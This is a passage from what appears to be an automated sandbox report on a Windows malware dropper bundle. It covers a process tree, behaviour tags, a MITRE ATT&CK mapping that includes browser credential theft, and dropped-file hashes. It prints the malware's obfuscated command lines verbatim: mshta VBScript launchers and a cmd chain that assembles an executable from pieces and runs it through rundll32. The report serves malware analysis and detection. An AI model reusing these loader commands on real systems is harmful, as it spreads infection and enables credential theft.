    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:884
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed20a5199a94f4fab.exe
      Wed20a5199a94f4fab.exe
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3200
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed20adc033d42.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3204
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed20adc033d42.exe
      Wed20adc033d42.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed20669c12bac107e.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1564
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed20669c12bac107e.exe
      Wed20669c12bac107e.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed209332277a1.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:60
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed209332277a1.exe
      Wed209332277a1.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1280
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed20e918c3fc.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2920
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed20e918c3fc.exe
      Wed20e918c3fc.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      PID:1740
    - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed20e918c3fc.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed20e918c3fc.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:1068
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed20ada9a0ea5a37a5a.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1232
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed20ada9a0ea5a37a5a.exe
      Wed20ada9a0ea5a37a5a.exe
      4⤵
      Executes dropped EXE
      Drops Chrome extension
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:2372
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1048
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2772
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        6⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4756
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        5⤵
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1440
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff9c7c0cc40,0x7ff9c7c0cc4c,0x7ff9c7c0cc58
        6⤵
        
        PID:732
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,17298479092161649397,13079118888015976059,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1912 /prefetch:2
        6⤵
        
        PID:3768
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2052,i,17298479092161649397,13079118888015976059,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2488 /prefetch:3
        6⤵
        
        PID:840
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2140,i,17298479092161649397,13079118888015976059,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2592 /prefetch:8
        6⤵
        
        PID:1976
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,17298479092161649397,13079118888015976059,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3108 /prefetch:1
        6⤵
        
        PID:4680
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3128,i,17298479092161649397,13079118888015976059,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3332 /prefetch:1
        6⤵
        
        PID:4552
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,17298479092161649397,13079118888015976059,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4524 /prefetch:1
        6⤵
        
        PID:1928
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4652,i,17298479092161649397,13079118888015976059,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3648 /prefetch:8
        6⤵
        
        PID:1924
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4980,i,17298479092161649397,13079118888015976059,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4992 /prefetch:8
        6⤵
        
        PID:4084
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5176,i,17298479092161649397,13079118888015976059,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5148 /prefetch:8
        6⤵
        
        PID:4180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed209992677e6.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed209992677e6.exe
      Wed209992677e6.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:540
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 1020
        5⤵
        Program crash
        
        PID:3120
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed2002a84690b72.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4444
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed2002a84690b72.exe
      Wed2002a84690b72.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1836
    - - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed2002a84690b72.exe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed2002a84690b72.exe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
        5⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1916
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed2002a84690b72.exe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed2002a84690b72.exe" ) do taskkill -F -Im "%~nXU"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2232
        
        C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe
        
        SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4768
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCRiPt: cloSe(cReATEOBJecT ("WScRIPt.SHelL" ).RUn ("C:\Windows\system32\cmd.exe /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" SkVPVS3t6Y8W.EXe && STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF ""/phmOv~geMVZhd~P51OGqJQYYUK "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe"" ) do taskkill -F -Im ""%~nXU"" ", 0, trUE) )
        8⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1976
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c copY /Y "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" SkVPVS3t6Y8W.EXe &&STart SkVPVs3t6Y8W.exE /phmOv~geMVZhd~P51OGqJQYYUK & iF "/phmOv~geMVZhd~P51OGqJQYYUK "== "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\SkVPVS3t6Y8W.EXe" ) do taskkill -F -Im "%~nXU"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2772
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vBsCRipT:CloSE ( CReaTEoBJEct ( "WSCRIPT.SHElL" ). rUn("cMd /q /C eCHo | SET /P = ""MZ"" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ + 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM & StARt control .\FUEj5.QM " , 0 , tRuE ) )
        8⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4952
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /C eCHo | SET /P = "MZ" > yW7bB.DeE &COpy /Y /b YW7bB.DEe + YLRXm6O.QZ+ 3UII17.UI + EZZS.MDf + Uts09Z.AiZ + JNYESn.Co FUEJ5.QM& StARt control .\FUEj5.QM
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:3992
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" eCHo "
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2996
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>yW7bB.DeE"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:4860
        
        C:\Windows\SysWOW64\control.exe
        
        control .\FUEj5.QM
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:5076
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\FUEj5.QM
        11⤵
        Checks computer location settings
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:1880
        
        C:\Windows\system32\RunDll32.exe
        
        C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\FUEj5.QM
        12⤵
        
        PID:3680
        
        C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\FUEj5.QM
        13⤵
        Blocklisted process makes network request
        Checks computer location settings
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\e589aa5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e589aa5.exe"
        14⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5656
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5656 -s 780
        15⤵
        Program crash
        
        PID:5720
        
        C:\Users\Admin\AppData\Local\Temp\e58d481.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e58d481.exe"
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5976
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5976 -s 780
        13⤵
        Program crash
        
        PID:6024
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -Im "Wed2002a84690b72.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4056
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed205f46b56e52065.exe /mixone
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4808
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed205f46b56e52065.exe
      Wed205f46b56e52065.exe /mixone
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      PID:4712
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 620
        5⤵
        Program crash
        
        PID:2624
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 640
        5⤵
        Program crash
        
        PID:1772
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 752
        5⤵
        Program crash
        
        PID:2040
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 780
        5⤵
        Program crash
        
        PID:2280
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 884
        5⤵
        Program crash
        
        PID:4084
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 920
        5⤵
        Program crash
        
        PID:1360
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 1104
        5⤵
        Program crash
        
        PID:3860
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 1112
        5⤵
        Program crash
        
        PID:5116
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 1344
        5⤵
        Program crash
        
        PID:4532
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 1264
        5⤵
        Program crash
        
        PID:5708
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4712 -s 1140
        5⤵
        Program crash
        
        PID:5820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c Wed20dd154a18517.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2040
  - - C:\Users\Admin\AppData\Local\Temp\7zS8AB23F37\Wed20dd154a18517.exe
      Wed20dd154a18517.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Checks SCSI registry key(s)
      PID:1004
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1004 -s 356
        5⤵
        Program crash
        
        PID:2936
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2388 -s 604
    3⤵
    - Program crash
    PID:1980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2388 -ip 2388
1⤵
PID:4888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1004 -ip 1004
1⤵
PID:4300

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 540 -ip 540
1⤵
PID:4552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4712 -ip 4712
1⤵
PID:232

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4712 -ip 4712
1⤵
PID:4848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4712 -ip 4712
1⤵
PID:1436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4712 -ip 4712
1⤵
PID:2892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4712 -ip 4712
1⤵
PID:1360

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4712 -ip 4712
1⤵
PID:4256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4712 -ip 4712
1⤵
PID:4204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4712 -ip 4712
1⤵
PID:3380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 4712 -ip 4712
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 5656 -ip 5656
1⤵
PID:5692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 5976 -ip 5976
1⤵
PID:6004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4712 -ip 4712
1⤵
PID:5688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4712 -ip 4712
1⤵
PID:5792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
7fb5fa1534dcf77f2125b2403b30a0ee

SHA1
365d96812a69ac0a4611ea4b70a3f306576cc3ea

SHA256
33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f

SHA512
a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
881566737c7c68367f849cca22192607

SHA1
e1163388e2a84a52a58254e276f89539476cb9ef

SHA256
5a706fcf90eb210e48447d22d4a718783e1f9164d623fef5ec209721eb12d871

SHA512
a6de97007db457b1e1eec3458ceeb62b9f3dd3c0ae12122f99c3877798013e052d10b3ff889ec0b6af737e3e15bccf2b33f82623835c6e0afa670fe233784cb9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
125bdfe3b9fb3cc2e168a5d88ae9afce

SHA1
150b788553b54faf9989a71f7a760b77d26d4d60

SHA256
98ad5fefaa9deb05255848c87c70201872653e02aada86ea707b9cb9fcfeda50

SHA512
a12d9a608550cb20598485e6c0bf42c9402f10a0e79720b94bb05e05162d93ae30956f6ef90791c854a2a897e787b0c74ca89f4bc0f4df00571ca19e1aed78b7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
de6a4a59d76f5af182af66d0fba1edb1

SHA1
0587a582740cfdefa36f893b0de9dedc3cbc2d24

SHA256
3104d42877f4a53f1ae42a26819f87d41152ab0b3904b71f3d379774b4515a2f

SHA512
780c2c9072acf44a2caaf1cd6557467a37373e7cd252da49faca65d114d58b72f2bcc6aae2ef872e7edf475f27bf5113e777db2601a0a15d5b525be61b46c3f1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
356B

MD5
dfac8a32ad16e859a58055b79dd5926b

SHA1
48015aff695a6f64fadbab7ffda060649efc5d12

SHA256
150d5913e0f5eb4a42140128c62aa733d822d3f443f23e948babbcd1eb5f6290

SHA512
8637b3f55574df4f2fea89384e27f9604e667d1be609866f9b29ecd49e48d595e0d5804a3ff58270311064389b70f04e302283f12d1e5433289c5f163fc1e5b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\d9dc3360-0230-4cde-ad80-45100c9e204c.tmp

Filesize
1KB

MD5
2fdc4bfe78068bbbcdcfead9aad135e3

SHA1
ab0d5ca95715adc3319f50f263138110278be50c

SHA256
4dc13b9f76e9e172b4d669dc9eab790d90a7cea232544e47ed4ae43363ed5cf1

SHA512
29ca645c40ebc0487ed94980d9f1864ee3e9520691d9f27d0f4f284ea3c5518cad8800368861e968fe4a34a85951bd630d234f91d678ff1a6120e3aef472cdff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
db47e2d911bb848e20de06c85cd6fee3

SHA1
0040d3aa9f5dcfccbc2b572f293a04c4922e5fdb

SHA256
a97392bbdb73f4d18ce6521598304ab2af6994ca734040a10ff0d6eed5b34b44

SHA512
b1ef77bde9e26eaba88564abf9872cade321478a020b7694f466ded52f6c1eefa879073056e261f4bd7c250feca978b03da715d1ee1b12c700a8579a5a9e5aeb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
292e403310fc05f833d4ce3e3f692535

SHA1
cb616fb3d32f0eebdd13d5524e9b64e74a48f618

SHA256
2009b2c19df590753718f092c393e25a9b780890fcee8a40fe909e0e9b38cc48

SHA512
cebb016ed72b4a750b74874265431567a77960a0258533241cbf887c47366c95bb00d90079b1688fd295e5f13d571599057b5d7d8f5d80fb28dc69fac9d62bdc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
8KB

MD5
239071f013b2e4ef896a19119e3fdc66

SHA1
8ccdf3ec1e1e4646645f74a10324c3fa6e4a5173

SHA256
bcf751355fdac1d9e3b991092149e7df70362282a7851a0e87e944bef387751a

SHA512
95eec1a9add493f34b2a77162b69615b4db6afb662dcb8578faa806ba4aeb1a3d4616934f8e8860d14f10ec20def0734368ebf21044b053aef425e5399809c85

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
18KB

MD5
c215e0c38909a3d0de87bb7a7e094216

SHA1
c08db5539e52c8f8048d020a12b97d7037c06ada

SHA256
ea76d74d6a5edb59183aab98ed6b773c500e3b63fa456b1e42b3a132e64ad534

SHA512
b4ae65ced51652f71db25a5f2a6c6527de4b6a3dd75c66eceae40d735ca5432c9b084c1a32864058a2a3055421ad254afff8ab80374512b97469043c898d531d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
19KB

MD5
d120ad4540a26c1c473151c40f50b94a

SHA1
9522b61503a09aa5f55844c573f2ac99dbdc5892

SHA256
30c6964a1580333267efe2d3d5dc1b24595e65307a25e46b1153e6276d624ebf

SHA512
6f9ef7508eefb99f0bd0951d6f5eb1eba827d13c45a620ab0eee4aad54f9066c6c89375ab1308d807bead172a7dc79b769c8fe279ae8c0c2aaabdd1398ec93a8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\f06a142b-a711-4473-8f44-b0be14063e98.tmp

Filesize
9KB

MD5
a2fc1ca3c112a77b92a25da0690d233b

SHA1
22d32c2450cfe16d6cd27a6712a8b46d6f268ad0

SHA256
3e7966d450b1acec9edd8d89f80a3cacba777f00a26cb9b5ecce4bce91e2c435

SHA512
fb61a623630e7d053c8c17ac1efb502674763e321d45feacbe443e2803f589d92c6e39321cd97c0bbe0e4baa3127ac0ad46a1b84bbcef3a697711c030781ee0e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
196KB

MD5
fbc2a6885812cca061056a556f848c32

SHA1
06ce79acb9656f57b02c0a84d9418f7b08c14aa0

SHA256
7184936f6f2150dd317cfdc7263f81e6e7b3f7dbcd0e3c8fe86414876ccbe9ba

SHA512
